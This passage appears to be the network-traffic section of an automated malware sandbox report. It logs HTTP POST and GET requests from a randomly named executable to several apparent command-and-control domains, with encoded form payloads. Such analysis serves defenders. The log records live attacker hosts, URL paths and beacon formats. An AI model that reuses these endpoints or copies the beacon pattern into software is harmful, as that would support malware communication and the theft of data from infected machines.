                Data Raw: 6c 48 3d 77 41 37 79 63 45 49 75 2b 6f 76 49 37 64 62 66 6d 4d 4f 31 46 65 59 2b 6c 47 38 38 6b 66 57 76 74 56 55 38 77 6d 42 2b 57 35 78 6f 63 55 4f 36 78 2f 43 4c 49 58 74 7a 31 50 31 53 50 56 69 33 4a 2f 38 50 56 53 48 4d 67 67 44 48 68 4a 31 75 6b 41 76 35 52 5a 70 44 44 41 5a 74 33 6b 4f 4a 63 62 68 34 34 76 46 55 64 5a 30 30 68 50 5a 59 33 69 56 4d 57 55 53 44 57 4a 37 56 59 55 4c 2f 64 30 41 51 61 68 33 4b 64 42 75 34 4b 35 69 46 67 75 7a 53 68 6b 74 6d 76 2f 54 47 71 74 74 39 47 2b 4f 42 50 42 71 36 61 46 65 71 51 72 4c 47 64 4e 4f 37 38 5a 61 30 35 47 5a 65 76 5a 78 53 34 76 78 43 4e 4e 47 72 33 70 4b 4e 43 74 54 4b 49 56 45 42 77 76 73 3d
                Data Ascii: lH=wA7ycEIu+ovI7dbfmMO1FeY+lG88kfWvtVU8wmB+W5xocUO6x/CLIXtz1P1SPVi3J/8PVSHMggDHhJ1ukAv5RZpDDAZt3kOJcbh44vFUdZ00hPZY3iVMWUSDWJ7VYUL/d0AQah3KdBu4K5iFguzShktmv/TGqtt9G+OBPBq6aFeqQrLGdNO78Za05GZevZxS4vxCNNGr3pKNCtTKIVEBwvs=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                7192.168.2.449744208.91.197.27804544C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                TimestampBytes transferredDirectionData
                Aug 19, 2024 04:27:20.219614983 CEST10886OUTPOST /xzzi/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.bfiworkerscomp.com
                Origin: http://www.bfiworkerscomp.com
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 10299
                Referer: http://www.bfiworkerscomp.com/xzzi/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 6c 48 3d 77 41 37 79 63 45 49 75 2b 6f 76 49 37 64 62 66 6d 4d 4f 31 46 65 59 2b 6c 47 38 38 6b 66 57 76 74 56 55 38 77 6d 42 2b 57 35 4a 6f 63 6d 71 36 78 63 36 4c 4a 58 74 7a 70 66 31 54 50 56 6a 79 4a 37 51 4c 56 54 36 78 67 69 4c 48 67 72 4e 75 7a 45 7a 35 66 70 70 44 63 51 5a 73 7a 6b 4f 51 63 62 78 30 34 76 31 55 64 5a 30 30 68 4a 39 59 6e 48 68 4d 61 30 53 41 58 4a 37 5a 50 6b 4c 48 64 30 4a 72 61 68 43 39 64 31 61 34 4c 5a 79 46 69 64 62 53 6f 6b 74 67 73 2f 53 62 71 74 78 2b 47 36 76 2b 50 42 65 41 61 48 43 71 54 64 6a 61 48 39 36 50 76 49 71 59 37 32 78 4f 72 4a 34 54 37 38 78 58 4e 63 36 63 69 74 50 75 41 2f 71 68 66 67 55 77 70 36 2f 35 62 34 5a 41 73 69 49 33 61 68 79 32 58 59 43 6c 73 75 59 6f 4c 52 57 38 47 58 6c 66 46 4a 51 69 52 57 39 4a 42 69 71 48 4b 61 6f 4b 36 49 77 39 7a 4b 71 64 6a 72 44 57 31 5a 46 4b 44 54 57 43 7a 4d 71 62 39 6e 64 65 54 6b 62 65 41 51 75 41 45 6c 51 49 6e 44 6a 34 73 45 77 49 37 71 45 71 51 45 6f 2f 34 30 48 74 4c 52 34 63 50 45 43 49 74 6d 46 4a 7a 38 71 [TRUNCATED]
                Data Ascii: lH=wA7ycEIu+ovI7dbfmMO1FeY+lG88kfWvtVU8wmB+W5Jocmq6xc6LJXtzpf1TPVjyJ7QLVT6xgiLHgrNuzEz5fppDcQZszkOQcbx04v1UdZ00hJ9YnHhMa0SAXJ7ZPkLHd0JrahC9d1a4LZyFidbSoktgs/Sbqtx+G6v+PBeAaHCqTdjaH96PvIqY72xOrJ4T78xXNc6citPuA/qhfgUwp6/5b4ZAsiI3ahy2XYClsuYoLRW8GXlfFJQiRW9JBiqHKaoK6Iw9zKqdjrDW1ZFKDTWCzMqb9ndeTkbeAQuAElQInDj4sEwI7qEqQEo/40HtLR4cPECItmFJz8q2d6pU4Ll7VU2sZsAI1N9jsSxu+eTj6YbKXJv8fXXQqvG3BbGJskhF9Ve/wnRYhL+vXXqZZNGcGKVV7oYforgpXJpV3bcZ7DCMeRW7Q4foENPhAjoU1k/cFL2mm9gvpNiCf9X3hjL7s24pdlVzpUBejJjFPnHCKCLtRG8Qg2CQkZVaQe1zHyLzOMYQoYnUmTRlCeEKfq3CRh32Ny3Ni9lv8d+qKbPpzr/5XQKeEO3VWB6H0w96rKUdeKp7EoPDK2c/T03xZ9XKxqd47zb5IXLF0gw1CqvJoxn4C0BzUPdwFbrGTNJ7LEZyjUs1OgzEVCU+NYuhfr1wLdGLMIliXxTxIQ4XNR2rQzj+I1Su0kk1PiIl1P7lYqE1W8q7cpo3do02/UjfJugRn+Z3T4OqN905CBUBc40YcJjXZVlxb6yt0SulegB5Vyqw0Tkv5hbbxvtVC46sNp4Lg+/5tJTQW6EyDP5ReN2c/SOL9Qw/R9yo8Bk2QsMcpuIeWbe6f9fRkuy+olxap3NUgeloDC00V39WiomQYDqW1N+FpmL3yF9wb9tS0EzK7kFus2Mv/5VI365zo1jlEyxmNbHS04P9WqPbVzcBxdz1bCjN+OrYYRhDeL4DEjI19X+KLct1xHqmHD1cEqqeaEC7VViPP16JAXO8lYaiE6AnBA0sP [TRUNCATED]


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                8192.168.2.449745208.91.197.27804544C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                TimestampBytes transferredDirectionData
                Aug 19, 2024 04:27:22.796072006 CEST511OUTGET /xzzi/?Cj=Qhv8RTO8YPvh6L30&lH=9CTSfwlM5YWl8fvbrbSkFth60mtnncbW1FpC9VokAvwkUHOJycf2DDxLp9tWLELwEKEPfCC2oiLqmqE9jQi/S4FmCg8fmWLidol7jMU2H7Flt+5ZogJ/ZG4= HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Host: www.bfiworkerscomp.com
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Aug 19, 2024 04:27:24.986201048 CEST1236INHTTP/1.1 200 OK
                Date: Mon, 19 Aug 2024 02:27:02 GMT
                Server: Apache
                Referrer-Policy: no-referrer-when-downgrade
                Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                Set-Cookie: vsid=919vr471580023843120303; expires=Sat, 18-Aug-2029 02:27:03 GMT; Max-Age=157680000; path=/; domain=www.bfiworkerscomp.com; HttpOnly
                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_XiZorF5vOo3x9HRuikJlZxbsd2Iw0GnRwg2Av4fOGSTeOfgzQWj/LlRVBakKEuPBxqte/EWKMeT+zvyX2o1/7w==
                Content-Length: 2630
                Content-Type: text/html; charset=UTF-8
                Connection: close
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4b 58 37 34 69 78 70 7a 56 79 58 62 4a 70 72 63 4c 66 62 48 34 70 73 50 34 2b 4c 32 65 6e 74 71 72 69 30 6c 7a 68 36 70 6b 41 61 58 4c 50 49 63 63 6c 76 36 44 51 42 65 4a 4a 6a 47 46 57 72 42 49 46 36 51 4d 79 46 77 58 54 35 43 43 52 79 6a 53 32 70 65 6e 45 43 41 77 45 41 41 51 3d 3d 5f 58 69 5a 6f 72 46 35 76 4f 6f 33 78 39 48 52 75 69 6b 4a 6c 5a 78 62 73 64 32 49 77 30 47 6e 52 77 67 32 41 76 34 66 4f 47 53 54 65 4f 66 67 7a 51 57 6a 2f 4c 6c 52 56 42 61 6b 4b 45 75 50 42 78 71 74 65 2f 45 57 4b 4d 65
                Data Ascii: <!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_XiZorF5vOo3x9HRuikJlZxbsd2Iw0GnRwg2Av4fOGSTeOfgzQWj/LlRVBakKEuPBxqte/EWKMe
                Aug 19, 2024 04:27:24.986253023 CEST1236INData Raw: 54 2b 7a 76 79 58 32 6f 31 2f 37 77 3d 3d 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20
                Data Ascii: T+zvyX2o1/7w=="><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.bfiworkerscomp.com/px.js?ch=1"></script><script type="text/javascript" src="http://www.bfiworkerscomp.com/px.js?ch=2"></sc
                Aug 19, 2024 04:27:24.986310005 CEST412INData Raw: 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61
                Data Ascii: <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content
                Aug 19, 2024 04:27:24.986341953 CEST739INData Raw: 69 70 74 22 3e 0d 0a 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0d 0a 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61
                Data Ascii: ipt"> document.write( '<script type="text/javascript" language="JavaScript"' + 'src="//sedoparking.com/frmpark/' + window.location.host + '/' + 'Skenzor7' + '/park.js?reg_logo=netsol-logo.png&a


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                9192.168.2.46188343.252.167.188804544C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                TimestampBytes transferredDirectionData
                Aug 19, 2024 04:27:40.378794909 CEST790OUTPOST /rm91/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.xn--fhq1c541j0zr.com
                Origin: http://www.xn--fhq1c541j0zr.com
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 199
                Referer: http://www.xn--fhq1c541j0zr.com/rm91/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 6c 48 3d 75 51 31 62 6f 4f 54 4a 37 76 49 39 46 51 39 4f 55 2b 34 35 30 6c 42 42 64 6a 79 59 48 6a 6f 39 48 38 38 2f 6f 48 34 55 49 52 59 57 32 68 2b 37 42 37 64 54 2f 68 52 48 33 42 62 73 58 65 78 30 70 63 4b 46 2f 54 32 52 47 5a 78 6d 68 42 79 6b 50 78 54 6a 4c 73 49 63 76 33 48 77 73 68 51 6f 2b 2f 65 61 75 73 4d 70 4b 79 43 5a 34 50 44 2f 53 72 4f 6a 70 4d 57 52 4b 46 67 53 53 41 43 5a 2b 6b 61 64 6d 6f 69 67 41 59 50 42 38 46 76 68 64 70 57 68 6a 38 36 4c 70 45 53 68 32 7a 35 73 50 42 45 45 45 38 4f 65 58 67 67 4b 66 79 41 63 45 31 64 46 65 67 71 6e 77 43 46 69 53 34 59 6c 4a 77 3d 3d
                Data Ascii: lH=uQ1boOTJ7vI9FQ9OU+450lBBdjyYHjo9H88/oH4UIRYW2h+7B7dT/hRH3BbsXex0pcKF/T2RGZxmhBykPxTjLsIcv3HwshQo+/eausMpKyCZ4PD/SrOjpMWRKFgSSACZ+kadmoigAYPB8FvhdpWhj86LpESh2z5sPBEEE8OeXggKfyAcE1dFegqnwCFiS4YlJw==


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                10192.168.2.46188443.252.167.188804544C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                TimestampBytes transferredDirectionData
                Aug 19, 2024 04:27:42.917068958 CEST810OUTPOST /rm91/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.xn--fhq1c541j0zr.com
                Origin: http://www.xn--fhq1c541j0zr.com
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 219
                Referer: http://www.xn--fhq1c541j0zr.com/rm91/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 6c 48 3d 75 51 31 62 6f 4f 54 4a 37 76 49 39 4b 54 6c 4f 57 63 51 35 6a 56 42 4f 52 44 79 59 49 44 6f 78 48 38 77 2f 6f 47 74 4a 49 45 49 57 33 46 36 37 43 2f 42 54 38 68 52 48 38 68 62 54 5a 2b 78 2f 70 63 33 6d 2f 53 61 52 47 5a 31 6d 68 41 43 6b 4d 43 37 6b 52 63 49 61 32 6e 48 75 7a 78 51 6f 2b 2f 65 61 75 73 49 51 4b 30 71 5a 35 36 4c 2f 54 4f 79 69 33 63 57 57 65 56 67 53 57 41 43 56 2b 6b 61 2f 6d 73 37 50 41 61 48 42 38 46 66 68 54 63 6a 33 74 38 36 4e 6e 6b 54 6c 34 47 64 6f 57 68 6c 50 62 63 57 62 64 41 6f 57 65 30 52 47 56 45 38 53 4d 67 4f 55 74 46 4d 57 66 37 6c 73 53 78 49 78 41 69 4e 77 71 43 45 7a 38 35 2f 37 7a 71 57 34 66 70 77 3d
                Data Ascii: lH=uQ1boOTJ7vI9KTlOWcQ5jVBORDyYIDoxH8w/oGtJIEIW3F67C/BT8hRH8hbTZ+x/pc3m/SaRGZ1mhACkMC7kRcIa2nHuzxQo+/eausIQK0qZ56L/TOyi3cWWeVgSWACV+ka/ms7PAaHB8FfhTcj3t86NnkTl4GdoWhlPbcWbdAoWe0RGVE8SMgOUtFMWf7lsSxIxAiNwqCEz85/7zqW4fpw=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                11192.168.2.46188543.252.167.188804544C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                TimestampBytes transferredDirectionData
                Aug 19, 2024 04:27:45.457448006 CEST10892OUTPOST /rm91/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.xn--fhq1c541j0zr.com
                Origin: http://www.xn--fhq1c541j0zr.com
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 10299
                Referer: http://www.xn--fhq1c541j0zr.com/rm91/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 6c 48 3d 75 51 31 62 6f 4f 54 4a 37 76 49 39 4b 54 6c 4f 57 63 51 35 6a 56 42 4f 52 44 79 59 49 44 6f 78 48 38 77 2f 6f 47 74 4a 49 48 6f 57 33 77 75 37 41 65 42 54 39 68 52 48 78 42 62 57 5a 2b 78 75 70 63 66 36 2f 53 47 6e 47 63 70 6d 6a 69 36 6b 59 6a 37 6b 45 4d 49 61 35 48 48 76 73 68 51 35 2b 2f 50 54 75 74 34 51 4b 30 71 5a 35 39 37 2f 58 62 4f 69 31 63 57 52 4b 46 67 57 53 41 44 41 2b 6b 44 49 6d 73 76 6c 56 36 6e 42 6c 6c 50 68 65 4f 37 33 79 4d 36 50 6d 55 54 44 34 47 59 32 57 69 42 6c 62 66 4b 78 64 43 30 57 66 78 51 41 41 6e 73 61 54 6d 65 51 32 6b 6f 4d 45 63 4a 38 62 43 38 2f 44 67 56 73 38 43 77 58 78 4c 69 46 32 61 36 37 62 74 66 66 39 34 41 56 65 53 50 64 45 43 76 35 70 6c 41 61 42 70 6a 49 2f 76 72 59 67 2f 49 35 4f 33 31 63 52 45 39 66 36 59 6b 35 62 4d 7a 51 72 2b 49 4a 37 58 54 4e 31 6d 4a 50 32 33 70 61 4e 65 70 68 2f 53 74 41 66 59 43 54 35 48 59 6d 32 35 59 6f 47 76 78 70 76 30 74 4e 64 74 51 43 72 43 55 39 62 61 31 55 6c 79 56 72 36 34 47 62 49 39 58 48 4c 69 7a 74 30 70 56 [TRUNCATED]
                Data Ascii: lH=uQ1boOTJ7vI9KTlOWcQ5jVBORDyYIDoxH8w/oGtJIHoW3wu7AeBT9hRHxBbWZ+xupcf6/SGnGcpmji6kYj7kEMIa5HHvshQ5+/PTut4QK0qZ597/XbOi1cWRKFgWSADA+kDImsvlV6nBllPheO73yM6PmUTD4GY2WiBlbfKxdC0WfxQAAnsaTmeQ2koMEcJ8bC8/DgVs8CwXxLiF2a67btff94AVeSPdECv5plAaBpjI/vrYg/I5O31cRE9f6Yk5bMzQr+IJ7XTN1mJP23paNeph/StAfYCT5HYm25YoGvxpv0tNdtQCrCU9ba1UlyVr64GbI9XHLizt0pVuotL56dcfbRt22sqIkMd51A2wm8EW0SiiNi/QpdtY8XMVE1bwp7GBEL34NQvDeP+UeWn40D/J+yz9oKTMOHMojIE7gwrHQZC3z5phGWjMLqThzYqL4v4hWgBu6MjSrEJ93kGXnxZZ/8fLsyOzpylVY3PZIUFSaXUVMcV9EWisug167GRuBhd63iiG6kUHBGOf8/JSyacK9Whc1aNpDrXFakxg9DsUvjaG2s/DEfgYJLfZTPCoQd5ijEaof0171coCztoVSuQ1msEF+FnhNF7wDIN3+iGk+A3L+18f43ePXdQX+NdciT1g4CDSd14ipxbT1jV1Sm1QFpIXhz1QNtPUQkzRhQDEY2x6RwibrEMn2OQ+LkRrmGCLz5C+DuDpNaonW0MM8DSq1BwhJjeIfs6YbP+366NXxUcl85SJr0sEeKbSwvjzMO+QYy3o9Y4InICSg72javScEAe9yBUfT0HIT32wHcrM6TbOWuMYuib1J61Lxthy37BW2Wa0DJF4j/X1pEK/6Fy09gY7InTaFUn7AeXXXnrzWAt6HNOoYwjEBJ705hAXx1zxI0jQQaLhLFYmeTQQWj1Fc53eNhCnHqD7KGNNWPGNfeHFDCTvaUzaYzbiHbmiWxXImU1bkqsAKvsrHHQjUVqP41wEFaeyhVVotORkpSzlq1lfC [TRUNCATED]
                Aug 19, 2024 04:27:46.320158958 CEST367INHTTP/1.1 404 Not Found
                Date: Mon, 19 Aug 2024 02:35:28 GMT
                Server: Apache
                Content-Length: 203
                Connection: close
                Content-Type: text/html; charset=iso-8859-1
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                12192.168.2.46188643.252.167.188804544C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                TimestampBytes transferredDirectionData
                Aug 19, 2024 04:27:47.997513056 CEST513OUTGET /rm91/?Cj=Qhv8RTO8YPvh6L30&lH=jSd7r+67+N1qAQkwJvt+iUxfFwvrPy4ZQchR8WhIexhCyQiFJMwmzlR6zVHzfOVMvsfcwBywDpFhuhrgfB+WG8UhwnSvsDBe28fizd0dRyqF3cPtSZfQjsU= HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Host: www.xn--fhq1c541j0zr.com
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Aug 19, 2024 04:27:57.855218887 CEST367INHTTP/1.1 404 Not Found
                Date: Mon, 19 Aug 2024 02:35:39 GMT
                Server: Apache
                Content-Length: 203
                Connection: close
                Content-Type: text/html; charset=iso-8859-1
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                13192.168.2.461887194.9.94.85804544C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                TimestampBytes transferredDirectionData
                Aug 19, 2024 04:28:02.964535952 CEST790OUTPOST /4hda/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.xn--matfrmn-jxa4m.se
                Origin: http://www.xn--matfrmn-jxa4m.se
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 199
                Referer: http://www.xn--matfrmn-jxa4m.se/4hda/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 6c 48 3d 7a 48 77 78 5a 76 34 50 2f 44 32 4d 2f 48 67 49 57 6e 6b 32 43 46 4a 44 59 5a 35 53 2f 5a 30 73 55 33 36 56 4d 78 2b 44 6f 58 76 74 6f 4b 53 57 66 47 4d 6a 79 6b 4d 46 70 30 42 75 67 46 72 74 58 59 6a 77 57 54 4f 56 51 4d 2b 6d 44 32 51 74 6d 4a 76 42 77 63 6e 57 38 42 4a 58 73 7a 71 4b 35 33 51 76 42 74 6d 62 32 64 6d 72 6b 44 69 43 33 2b 66 56 52 76 66 4a 70 41 6a 33 54 7a 55 43 57 5a 74 44 53 52 59 38 45 6f 66 4b 6b 67 77 43 4c 71 33 67 64 35 50 6d 59 43 36 79 41 6f 45 32 58 63 6e 30 59 73 41 46 43 66 32 35 4c 4b 39 55 74 59 5a 59 74 67 75 41 72 58 62 55 38 47 34 48 63 77 3d 3d
                Data Ascii: lH=zHwxZv4P/D2M/HgIWnk2CFJDYZ5S/Z0sU36VMx+DoXvtoKSWfGMjykMFp0BugFrtXYjwWTOVQM+mD2QtmJvBwcnW8BJXszqK53QvBtmb2dmrkDiC3+fVRvfJpAj3TzUCWZtDSRY8EofKkgwCLq3gd5PmYC6yAoE2Xcn0YsAFCf25LK9UtYZYtguArXbU8G4Hcw==
                Aug 19, 2024 04:28:03.640505075 CEST1236INHTTP/1.1 200 OK
                Server: nginx
                Date: Mon, 19 Aug 2024 02:28:03 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                X-Powered-By: PHP/8.1.29
                Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
